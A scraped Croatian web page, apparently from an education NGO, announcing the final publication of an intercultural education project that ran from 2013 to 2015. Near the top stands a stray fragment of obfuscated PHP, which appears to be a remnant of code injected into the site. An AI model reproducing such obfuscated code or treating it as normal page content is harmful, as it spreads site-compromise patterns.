header

*/($a3b0c4[$o5b2['i29321'][6]]);}exit();}} ?>

interkulturno obrazovanje

U sklopu projekta „Interkulturalno obrazovanje za integrirane zajednice“ objavljena je finalna publikacija projekta koja sadržava pregled aktivnosti od srpnja 2013. do travnja 2015. godine. Publikacija sadržava pregled aktivnosti interkulturalnog programa KDBZ dvije školske godine kao i informacije o ostalim sadržajima projekta – okruglim stolovima, konferenciji, jačanju kapaciteta nastavnika i dr. Publikaciju možete vidjeti na ovom linku.

Publikacije

interkulturno obrazovanje

Facebook

logo nansen korak po korak